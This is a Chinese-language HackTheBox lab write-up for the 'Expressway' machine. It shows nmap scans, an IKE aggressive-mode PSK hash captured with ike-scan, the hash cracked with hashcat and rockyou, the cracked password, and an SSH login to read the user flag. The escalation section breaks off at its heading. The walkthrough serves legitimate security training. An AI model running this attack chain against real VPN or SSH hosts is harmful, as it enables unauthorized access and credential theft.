HackTheBox: Expressway - 渗透记录

机器信息

  • 主机名: expressway.htb
  • 难度: 简单
  • 操作系统: Linux(Debian)
  • 服务: SSH、IPSec VPN

摘要

Expressway 是一台展示弱 IPSec VPN 配置与 sudo 漏洞危害的 Linux 主机。初始访问通过利用 IKE Aggressive 模式获取并破解弱预共享密钥(PSK)实现,从而获得 SSH 访问权限。提权则通过 CVE-2025-32463,即 sudo chroot 逃逸漏洞完成。

信息收集

初始端口扫描

首先进行标准的 TCP 服务扫描,以识别开放端口和运行的服务:

nmap -sV -sC 10.129.x.x

完整结果:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-20 14:45 CDT
Nmap scan report for Expressway.htb (10.129.x.x)
Host is up (0.0091s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.86 seconds

仅在 TCP 上暴露了 SSH,说明需要更深入的探测。

UDP 扫描

由于 TCP 结果有限,继续探测 UDP 服务:

nmap -sU 10.129.x.x --min-rate 5000

完整结果:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-20 14:48 CDT
Nmap scan report for Expressway.htb (10.129.x.x)
Host is up (0.011s latency).
Not shown: 993 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
500/udp   open   isakmp

Nmap done: 1 IP address (1 host up) scanned in 0.73 seconds

500/udp 端口表明运行着 IPSec VPN 服务。ISAKMP(Internet Security Association and Key Management Protocol)用于建立 IPSec 的安全关联。

VPN 服务分析

IKE(Internet Key Exchange)枚举

500/udp 端口指向 IPSec VPN,使用 ike-scan 枚举该 IKE 服务:

sudo ike-scan -M expressway.htb

完整输出:

Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.x.x	Main Mode Handshake returned
	HDR=(CKY-R=9f82d861ee3ca556)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.124 seconds (8.07 hosts/sec).  1 returned handshake; 0 returned notify

关键信息:

  • Main Mode 握手成功
  • 加密:3DES(现代标准下较弱)
  • 哈希:SHA1
  • 认证方式:PSK(预共享密钥)
  • 检测到支持 XAUTH
  • 启用死对端检测(DPD)

Aggressive 模式测试

Main Mode 会保护哈希交换,而 Aggressive 模式会明文发送哈希,可被离线破解:

sudo ike-scan -A -Ppsk.txt expressway.htb

关键发现:

Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.x.x	Aggressive Mode Handshake returned 
	HDR=(CKY-R=11ddb728fb4c93f1) 
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) 
	KeyExchange(128 bytes) 
	Nonce(32 bytes) 
	ID(Type=ID_USER_FQDN, [email protected]) 
	VID=09002689dfd6b712 (XAUTH) 
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) 
	Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.016 seconds (60.74 hosts/sec).  1 returned handshake; 0 returned notify

成功!Aggressive 模式泄露了:

  • 用户标识:[email protected]
  • PSK 哈希已保存到 psk.txt
  • 捕获了包含密钥交换、Nonce 和 Hash 数据的完整握手

哈希破解

提取 PSK

Aggressive 模式响应包含 IKE PSK 哈希,使用 hashcat 破解:

hashcat psk.txt /usr/share/wordlists/rockyou.txt

Hashcat 自动检测出哈希类型为:

  • 哈希模式: 5400(IKE-PSK SHA1)

查看破解结果:

hashcat psk.txt /usr/share/wordlists/rockyou.txt --show

完整输出:

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5400 | IKE-PSK SHA1 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

ac40728b45d9e097252ecef2c31da0e2d081ccc2163b6b6cac087a087ad8ded7ed8f27539964b2779e2c5e547d74aa282b3a8afd449d4b8cbbf4cfa9ad0cfc896b65a90599b84b2b67728cb434db8bf048897070db8996988ba70d584167d5c029bb8e36e31f123ce2bafa9f9aa850fcb917aa2ecc8d1a07c64ab32016e03533:168cef94af426be072780df8b134faf08741bf3b62e1e93c657a19f0e11a2fca668da45cc9c7561100ce28085fd3e27136d731225549c71e77379e75fc2224676f4219a91f9cac53e8fc849b4d72d633b7ad42f138a2c1f55416db4c428e6d6d8d2dbeada86dc81d9d1c040795080f91f9237f793ac4f038db157644ecd8a724:11ddb728fb4c93f1:ecb2bdd2ba3e7df7:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e68:0925fbf9f188daf8bb3f4fbace1167d63a0e63a0:2a6b8d6ae489335962160c9caeb668bf7e77b6c2e51a5675d693504a87d1b093:b211eb1d061230d3e072758b8e581cff96aecee1:freakingrockstarontheroad

破解凭据:

  • 用户名: ike
  • 密码: freakingrockstarontheroad

An image to describe post

该密码是 rockyou 字典中的短语,强调了使用强且唯一 PSK 的重要性。

初始访问

SSH 登录

使用已获取的凭据,通过 SSH 登录主机:

ssh [email protected]
# 密码:freakingrockstarontheroad

用户标志

登录后读取用户标志文件:

cat /home/ike/user.txt

权限提升

#滲透測試 #VPS #漏洞利用